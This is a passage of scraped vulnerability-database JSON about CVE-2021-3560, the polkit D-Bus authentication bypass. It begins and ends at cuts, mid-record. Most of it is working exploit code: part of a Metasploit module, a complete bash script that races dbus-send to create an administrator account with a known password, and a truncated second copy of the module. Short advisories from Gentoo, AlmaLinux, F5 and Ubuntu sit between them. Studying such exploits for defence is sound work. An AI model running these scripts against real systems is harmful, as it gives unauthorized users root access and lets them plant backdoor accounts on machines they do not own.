(\\d+\\S*)/\n return CheckCode::Safe('The polkit framework is not installed.')\n end\n\n # The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To\n # do that, the distro specific package manager would need to be queried. See #check_via_version.\n polkit_version = Rex::Version.new(Regexp.last_match(1))\n\n unless cmd_exec('dbus-send -h') =~ /Usage: dbus-send/\n return CheckCode::Detected('The dbus-send command is not accessible, however the polkit framework is installed.')\n end\n\n # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit\n @cmd_delay = get_cmd_delay\n return CheckCode::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?\n\n status = nil\n print_status('Checking for exploitability via attempt')\n status ||= check_via_attempt\n print_status('Checking for exploitability via version') unless status\n status ||= check_via_version\n status ||= CheckCode::Detected(\"Detected polkit framework version #{polkit_version}.\")\n\n status\n end\n\n def check_via_attempt\n status = nil\n return status unless !is_root? && command_exists?('dbus-send')\n\n # This is required to make the /org/freedesktop/Accounts/User0 object_path available.\n dbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root')\n # Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a\n # random string before restoring it.\n result = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName')\n if result =~ /variant\\s+string\\s+\"(.*)\"/\n old_realname = Regexp.last_match(1)\n if exploit_set_realname(rand_text_alphanumeric(12))\n status = CheckCode::Vulnerable('The polkit framework instance is vulnerable.')\n unless exploit_set_realname(old_realname)\n print_error('Failed to restore the root user\\'s original \\'RealName\\' property value')\n end\n end\n end\n\n status\n end\n\n def check_via_version\n sysinfo = get_sysinfo\n case sysinfo[:distro]\n when 'fedora'\n if sysinfo[:version] =~ /Fedora( release)? (\\d+)/\n distro_version = Regexp.last_match(2).to_i\n if distro_version < 20\n return CheckCode::Safe(\"Fedora version #{distro_version} is not affected (too old).\")\n elsif distro_version < 33\n return CheckCode::Appears(\"Fedora version #{distro_version} is affected.\")\n elsif distro_version == 33\n # see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-3f8d6016c9\n patched_version_string = '0.117-2.fc33.1'\n elsif distro_version == 34\n # see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-0ec5a8a74b\n patched_version_string = '0.117-3.fc34.1'\n elsif distro_version > 34\n return CheckCode::Safe(\"Fedora version #{distro_version} is not affected.\")\n end\n\n result = cmd_exec('dnf list installed \"polkit.*\"')\n if result =~ /polkit\\.\\S+\\s+(\\d\\S+)\\s+/\n current_version_string = Regexp.last_match(1)\n if Rex::Version.new(current_version_string) < Rex::Version.new(patched_version_string)\n return CheckCode::Appears(\"Version #{current_version_string} is affected.\")\n else\n return CheckCode::Safe(\"Version #{current_version_string} is not affected.\")\n end\n end\n end\n when 'ubuntu'\n result = cmd_exec('apt-cache policy policykit-1')\n if result =~ /\\s+Installed: (\\S+)$/\n current_version_string = Regexp.last_match(1)\n current_version = Rex::Version.new(current_version_string.gsub(/ubuntu/, '.'))\n\n if current_version < Rex::Version.new('0.105-26')\n # The vulnerability was introduced in 0.105-26\n return CheckCode::Safe(\"Version #{current_version_string} is not affected (too old, the vulnerability was introduced in 0.105-26).\")\n end\n\n # See: https://ubuntu.com/security/notices/USN-4980-1\n # The 'ubuntu' part of the string must be removed for Rex::Version compatibility, treat it as a point place.\n case sysinfo[:version]\n when /21\\.04/\n patched_version_string = '0.105-30ubuntu0.1'\n when /20\\.10/\n patched_version_string = '0.105-29ubuntu0.1'\n when /20\\.04/\n patched_version_string = '0.105-26ubuntu1.1'\n when /19\\.10/\n return CheckCode::Appears('Ubuntu 19.10 is affected.')\n end\n # Ubuntu 19.04 and older are *not* affected\n\n if current_version < Rex::Version.new(patched_version_string.gsub(/ubuntu/, '.'))\n return CheckCode::Appears(\"Version #{current_version_string} is affected.\")\n end\n\n return CheckCode::Safe(\"Version #{current_version_string} is not affected.\")\n end\n end\n end\n\n def cmd_exec(*args)\n result = super\n result.gsub(/(\\e\\(B)?\\e\\[([;\\d]+)?m/, '') # remove ANSI escape sequences from the command output\n end\n\n def dbus_method_call(object_path, interface_member, *args)\n cmd_args = %w[dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply]\n cmd_args << object_path\n cmd_args << interface_member\n args.each do |arg|\n if arg.is_a?(Integer)\n cmd_args << \"int32:#{arg}\"\n elsif arg.is_a?(String)\n cmd_args << \"string:'#{arg}'\"\n end\n end\n\n cmd = cmd_args.join(' ')\n vprint_status(\"Running: #{cmd}\")\n cmd_exec(cmd)\n end\n\n def create_unix_crypt_hash\n UnixCrypt::SHA256.build(datastore['PASSWORD'].to_s)\n end\n\n def exploit_set_username(loop_sequence)\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts\n org.freedesktop.Accounts.CreateUser\n string:#{datastore['USERNAME']}\n string:\\\"#{datastore['USERNAME']}\\\"\n int32:1 &\n sleep #{@cmd_delay}s;\n kill $!;\n if id #{datastore['USERNAME']}; then\n echo \\\"success\\\";\n break;\n fi;\n done\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def exploit_set_password(uid, hashed_password, loop_sequence)\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts/User#{uid}\n org.freedesktop.Accounts.User.SetPassword\n string:'#{hashed_password}'\n string: &\n sleep #{@cmd_delay}s;\n kill $!;\n echo #{datastore['PASSWORD']}\n | su - #{datastore['USERNAME']}\n -c \\\"echo #{datastore['PASSWORD']} | sudo -S id\\\"\n | grep \\\"uid=0(root)\\\";\n if [ $? -eq 0 ]; then\n echo \\\"success\\\";\n break;\n fi;\n done;\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def exploit_delete_user(uid, loop_sequence)\n cmd_exec(<<~SCRIPT\n for i in #{loop_sequence}; do\n dbus-send\n --system\n --dest=org.freedesktop.Accounts\n --type=method_call\n --print-reply\n /org/freedesktop/Accounts\n org.freedesktop.Accounts.DeleteUser\n int64:#{uid}\n boolean:true &\n sleep #{@cmd_delay}s;\n kill $!;\n if id #{datastore['USERNAME']}; then\n echo \\\"failed\\\";\n else\n echo \\\"success\\\";\n break;\n fi;\n done\n SCRIPT\n .gsub(/\\s+/, ' ')) =~ /success/\n end\n\n def upload(path, data)\n print_status(\"Writing '#{path}' (#{data.size} bytes) ...\")\n rm_f(path)\n write_file(path, data)\n register_file_for_cleanup(path)\n end\n\n def upload_and_chmodx(path, data)\n upload(path, data)\n chmod(path)\n end\n\n def upload_payload\n fname = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(5)}\"\n upload_and_chmodx(fname, generate_payload_exe)\n return nil unless file_exist?(fname)\n\n fname\n end\n\n def execute_payload(fname)\n cmd_exec(\"echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \\\"echo #{datastore['PASSWORD']} | sudo -S #{fname}\\\"\")\n end\n\n def exploit\n fail_with(Failure::NotFound, 'Failed to find the su command which this exploit depends on.') unless command_exists?('su')\n fail_with(Failure::NotFound, 'Failed to find the dbus-send command which this exploit depends on.') unless command_exists?('dbus-send')\n if datastore['TIMEOUT'] < 26\n fail_with(Failure::BadConfig, \"TIMEOUT is set to less than 26 seconds, so we can't detect if dbus-send times out or not.\")\n end\n\n if @cmd_delay.nil?\n # cmd_delay wasn't set yet which is needed for the rest of the exploit to operate,\n # likely cause the check method wasn't executed. Lets set it so long.\n\n # Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit\n @cmd_delay = get_cmd_delay\n fail_with(Failure::Unknown, 'Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil?\n end\n\n print_status(\"Attempting to create user #{datastore['USERNAME']}\")\n loop_sequence = get_loop_sequence\n\n fail_with(Failure::BadConfig, \"The user #{datastore['USERNAME']} was unable to be created. Try increasing the ITERATIONS amount.\") unless exploit_set_username(loop_sequence)\n uid = cmd_exec(\"id -u #{datastore['USERNAME']}\")\n print_good(\"User #{datastore['USERNAME']} created with UID #{uid}\")\n print_status(\"Attempting to set the password of the newly created user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}\")\n if exploit_set_password(uid, create_unix_crypt_hash, loop_sequence)\n print_good('Obtained code execution as root!')\n fname = upload_payload\n execute_payload(fname)\n else\n print_error(\"Attempted to set the password #{datastore['Iterations']} times, did not work.\")\n end\n\n print_status('Attempting to remove the user added: ')\n if exploit_delete_user(uid, loop_sequence)\n print_good(\"Successfully removed #{datastore['USERNAME']}\")\n else\n print_warning(\"Unable to remove user: #{datastore['USERNAME']}, created during the running of this module\")\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36544", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:20:12", "description": "", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-15T00:00:00", "type": "zdt", "title": "Polkit 0.105-26 0.117-2 - Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-15T00:00:00", "id": "1337DAY-ID-36421", "href": "https://0day.today/exploit/description/36421", "sourceData": "# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation\n# Exploit Author: J Smith (CadmusofThebes)\n# Vendor Homepage: https://www.freedesktop.org/\n# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html\n# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)\n# Tested on: Ubuntu 20.04, Fedora 33\n# CVE: CVE-2021-3560\n# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/\n\n#!/bin/bash\n\n# Set the name and display name\nuserName=\"hacked\"\nrealName=\"hacked\"\n\n# Set the account as an administrator\naccountType=1 \n\n# Set the password hash for 'password' and password hint\npassword='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'\npassHint=\"password\"\n\n# Check Polkit version\npolkitVersion=$(systemctl status polkit.service | grep version | cut -d \" \" -f 9)\nif [[ \"$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)\" -ge 1 || \"$(yum list installed | grep polkit | grep -c 0.117-2)\" ]]; then\n echo \"[*] Vulnerable version of polkit found\"\nelse\n echo \"[!] WARNING: Version of polkit might not vulnerable\"\nfi\n\n# Validate user is running in SSH instead of desktop terminal\nif [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then\n echo \"[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts\"\n exit\nfi\n\n# Test the dbus-send timing to load into exploit\necho \"[*] Determining dbus-send timing\"\nrealTime=$( TIMEFORMAT=\"%R\"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d \" \" -f6 )\nhalfTime=$(echo \"scale=3;$realTime/2\" | bc)\n\n# Check for user first in case previous run of script failed on password set\nif id \"$userName\" &>/dev/null; then\n userid=$(id -u $userName)\n echo \"[*] New user $userName already exists with uid of $userid\"\nelse\n userid=\"\"\n\techo \"[*] Attempting to create account\"\n while [[ $userid == \"\" ]]\n do\n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\n if id \"$userName\" &>/dev/null; then\n\t userid=$(id -u $userName)\n echo \"[*] New user $userName created with uid of $userid\"\n fi\n done\nfi\n\n# Add the password to /etc/shadow\necho \"[*] Adding password to /etc/shadow\"\nx=0\nwhile [ $x -lt 100 ]\ndo \n dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null\n x=$(($x + 1))\ndone\n\necho \"[*] Exploit complete! If the password does not work, run the exploit again\"\necho \"\"\necho \"[*] Run 'su - $userName', followed by 'sudo su' to gain root access\"\n", "sourceHref": "https://0day.today/exploit/36421", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-06-19T15:33:05", "description": "### Background\n\npolkit is a toolkit for managing policies related to unprivileged processes communicating with privileged process. \n\n### Description\n\nThe function polkit_system_bus_name_get_creds_sync() was called without checking for error, and as such temporarily treats the authentication request as coming from root. \n\n### Impact\n\nPlease review the referenced CVE identifiers for details.\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll polkit users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-auth/polkit-0.119\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "gentoo", "title": "polkit: Privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-13T00:00:00", "id": "GLSA-202107-31", "href": "https://security.gentoo.org/glsa/202107-31", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "almalinux": [{"lastseen": "2022-02-28T20:28:19", "description": "The polkit packages provide a component for controlling system-wide privileges. This component provides a uniform and organized way for non-privileged processes to communicate with privileged ones.\n\nSecurity Fix(es):\n\n* polkit: local privilege escalation using polkit_system_bus_name_get_creds_sync() (CVE-2021-3560)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T07:54:47", "type": "almalinux", "title": "Important: polkit security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-08-11T08:41:45", "id": "ALSA-2021:2238", "href": "https://errata.almalinux.org/8/ALSA-2021-2238.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-03-01T23:14:45", "description": "It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. ([CVE-2021-3560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T06:05:00", "type": "f5", "title": "polkit vulnerability CVE-2021-3560", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2022-03-01T23:13:00", "id": "F5:K41410307", "href": "https://support.f5.com/csp/article/K41410307", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-06-19T15:36:19", "description": "## Releases\n\n * Ubuntu 21.04 \n * Ubuntu 20.10 \n * Ubuntu 20.04 LTS\n\n## Packages\n\n * policykit-1 \\- framework for managing administrative policies and privileges\n\nKevin Backhouse discovered that polkit incorrectly handled errors in the \npolkit_system_bus_name_get_creds_sync function. A local attacker could \npossibly use this issue to escalate privileges.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "ubuntu", "title": "polkit vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3560"], "modified": "2021-06-03T00:00:00", "id": "USN-4980-1", "href": "https://ubuntu.com/security/notices/USN-4980-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-07-09T17:17:59", "description": "", "cvss3": {}, "published": "2021-07-09T00:00:00", "type": "packetstorm", "title": "Polkit D-Bus Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3560"], "modified": "2021-07-09T00:00:00", "id": "PACKETSTORM:163452", "href": "https://packetstormsecurity.com/files/163452/Polkit-D-Bus-Authentication-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'unix_crypt' \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Local::Linux \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Polkit D-Bus Authentication Bypass', \n'Description' => %q{ \nA vulnerability exists within the polkit system service that can be leveraged by a local, unprivileged \nattacker to perform privileged operations. In order to leverage the vulnerability, the attacker invokes a \nmethod over D-Bus and kills the client process. This will occasionally cause the operation to complete without \nbeing subjected to all of the necessary authentication. \nThe exploit module leverages this to add a new user with a sudo access and a known password. The new account \nis then leveraged to execute a payload with root privileges. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Kevin Backhouse', # vulnerability discovery and analysis \n'Spencer McIntyre', # metasploit module \n'jheysel-r7' # metasploit module \n], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Platform' => ['unix', 'linux'], \n'References' => [ \n['URL', 'https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/'], \n['CVE', '2021-3560'], \n['EDB', '50011'] \n], \n'Targets' => \n[ \n[ 'Automatic', {} ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-06-03', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, SCREEN_EFFECTS], \n'Reliability' => [REPEATABLE_SESSION] \n} \n) \n) \nregister_options([ \nOptString.new('USERNAME', [ true, 'A username to add as root', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\\$)$/), \nOptString.new('PASSWORD', [ true, 'A password to add for the user (default: random)', rand_text_alphanumeric(8)]), \nOptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 30]), \nOptInt.new('ITERATIONS', [ true, 'Due to the race condition the command might have to be run multiple times before it is successful. Use this to define how many times each command is attempted', 20]) \n]) \nregister_advanced_options([ \nOptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) \n]) \nend \n \ndef get_loop_sequence \ndatastore['ITERATIONS'].times.map(&:to_s).join(' ') \nend \n \ndef exploit_set_realname(new_realname) \nloop_sequence = get_loop_sequence \ncmd_exec(<<~SCRIPT \nfor i in #{loop_sequence}; do \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--type=method_call \n--print-reply \n/org/freedesktop/Accounts/User0 \norg.freedesktop.Accounts.User.SetRealName \nstring:'#{new_realname}' & \nsleep #{@cmd_delay}; \nkill $!; \ndbus-send \n--system \n--dest=org.freedesktop.Accounts \n--print-reply \n/org/freedesktop/Accounts/User0 \norg.freedesktop.DBus.Properties.Get \nstring:org.freedesktop.Accounts.User \nstring:RealName \n| grep \"string \\\\\"#{new_realname}\\\\\"\"; \nif [ $? -eq 0 ]; then \necho success; \nbreak; \nfi; \ndone \nSCRIPT \n.gsub(/\\s+/, ' ')) =~ /success/ \nend \n \ndef executable?(path) \ncmd_exec(\"test -x '#{path}' && echo true\").include? 'true' \nend \n \ndef get_cmd_delay \nuser = rand_text_alphanumeric(8) \ntime_command = \"bash -c 'time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:#{user} string:\\\"#{user}\\\" int32:1'\" \ntime = cmd_exec(time_command, nil, datastore['TIMEOUT']).match(/real\\s+\\d+m(\\d+.\\d+)s/) \nunless time && time[1] \nprint_error(\"Unable to determine the time taken to run the dbus command, so the exploit cannot continue. Try increasing the TIMEOUT option. The command that failed was: #{time_command}\") \nreturn nil \nend \n \ntime_in_seconds = time[1].to_f \n# The dbus-send command timeout is implementation-defined, typically 25 seconds \n# https://dbus.freedesktop.org/doc/dbus-send.1.html#:~:text=25%20seconds \nif time_in_seconds > datastore['TIMEOUT'].to_f || time_in_seconds > 25.00 \nprint_error('The dbus-send command timed out which means the exploit cannot continue. This is likely due to the session service type being X11 instead of SSH. Please see the module documentation for more information.') \nreturn nil \nend \ntime_in_seconds / 2 \nend \n \ndef check \nif datastore['TIMEOUT'] < 26 \nreturn CheckCode::Unknown(\"TIMEOUT is set to less than 26 seconds, so we can't detect if polkit times out or not.\") \nend \n \nunless cmd_exec('pkexec --version') =~ /pkexec version (\\d+\\S*)/ \nreturn CheckCode::Safe('The polkit framework is not installed.') \nend \n \n# The version as returned by pkexec --version is insufficient to identify whether or not the patch is installed. To \n# do that, the distro specific package manager would need to be queried. See #check_via_version. \npolkit_version = Rex::Version.new(Regexp.last_match(1)) \n \nunless cmd_exec('dbus-send -h') =~ /Usage: dbus-send/ \nreturn CheckCode::Detected('The dbus-send command is not accessible, however the polkit framework is installed.') \nend \n \n# Calculate the round trip time for the dbus command we want to kill half way through in order to trigger the exploit \n@cmd_delay = get_cmd_delay \nreturn CheckCode::Unknown('Failed to calculate the round trip time for the dbus command. This is necessary in order to exploit the target.') if @cmd_delay.nil? \n \nstatus = nil \nprint_status('Checking for exploitability via attempt') \nstatus ||= check_via_attempt \nprint_status('Checking for exploitability via version') unless status \nstatus ||= check_via_version \nstatus ||= CheckCode::Detected(\"Detected polkit framework version #{polkit_version}.\") \n \nstatus \nend \n \ndef check_via_attempt \nstatus = nil \nreturn status unless !is_root? && command_exists?('dbus-send') \n \n# This is required to make the /org/freedesktop/Accounts/User0 object_path available. \ndbus_method_call('/org/freedesktop/Accounts', 'org.freedesktop.Accounts.FindUserByName', 'root') \n# Check for the presence of the vulnerability be exploiting it to set the root user's RealName property to a \n# random string before restoring it. \nresult = dbus_method_call('/org/freedesktop/Accounts/User0', 'org.freedesktop.DBus.Properties.Get', 'org.freedesktop.Accounts.User', 'RealName') \nif result =~ /variant\\s+string\\s+\"(.*)\"/ \nold_realname = Regexp.last_match(1) \nif exploit_set_realname(rand_text_alphanumeric(12)) \nstatus = CheckCode::Vulnerable('The polkit framework instance is vulnerable.') \nunless exploit_set_realname(old_realname) \nprint_error('Failed to restore the root user\\'s original \\'RealName\\' property value') \nend \nend \nend \n \nstatus \nend \n \ndef check_via_version \nsysinfo = get_sysinfo \ncase sysinfo[:distro] \nwhen 'fedora' \nif sysinfo[:version] =~ /Fedora( release)? (\\d+)/ \ndistro_version = Regexp.last_match(2).to_i \nif distro_version < 20 \nreturn CheckCode::Safe(\"Fedora version #{distro_version} is not affected (too old).\") \nelsif distro_version < 33 \nreturn CheckCode::Appears(\"Fedora version #{distro_version} is affected.\") \nelsif distro_version == 33 \n# see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-3f8d6016c9 \npatched_version_string = '0.117-2.fc33.1' \nelsif distro_version == 34 \n# see: https://bodhi.fedoraproject.org/updates/FEDORA-2021-0ec5a8a74b \npatched_version_string = '0.117-3.fc34.1' \nelsif distro_version > 34 \nreturn CheckCode::Safe(\"Fedora version #{distro_version} is not affected.\") \nend \n \nresult = cmd_exec('dnf list installed \"polkit.*\"') \nif result =~ /polkit\\.\\S+\\s+(\\d\\S+)\\s+/ \ncurrent_version_string = Regexp.last_match(1) \nif Rex::Version.new(current_version_string) < Rex::Version.new(patched_version_string) \nreturn CheckCode::Appears(\"Version #{current_version_string} is affected.\") \nelse \nreturn CheckCode::Safe(\"Version #{current_version_string} is not affected.\") \nend \nend \nend \nwhen 'ubuntu' \nresult = cmd_exec('apt-cache policy policykit-1') \nif result =~ /\\s+Installed: (\\S+)$/ \ncurrent_version_string = Regexp.last_match(1) \ncurrent_version = Rex::Version.new(current_version_string.gsub(/ubuntu/, '.')) \n \nif current_version < Rex::Version.new('0.105-26') \n# The vulnerability was introduced in 0.105-26 \nreturn CheckCode::Safe(\"Version #{current_version_string} is not affected (too old, the vulnerability was introduced in 0.105-26).\") \nend \n \n# See: https://ubuntu.com/security/notices/USN-4980-1 \n# The 'ubuntu' part of the string must be removed for Rex::Version compatibility, treat it as a point place. \ncase sysinfo[:version] \nwhen /21\\.04/ \npatched_version_string = '0.105-30ubuntu0.1' \nwhen /20\\.10/ \npatched_version_string = '0.105-29ubuntu0.1' \nwhen /20\\.04/ \npatched_version_string = '0.105-26ubuntu1.1' \nwhen /19\\.10/ \nreturn CheckCode::Appears('Ubuntu 19.10 is 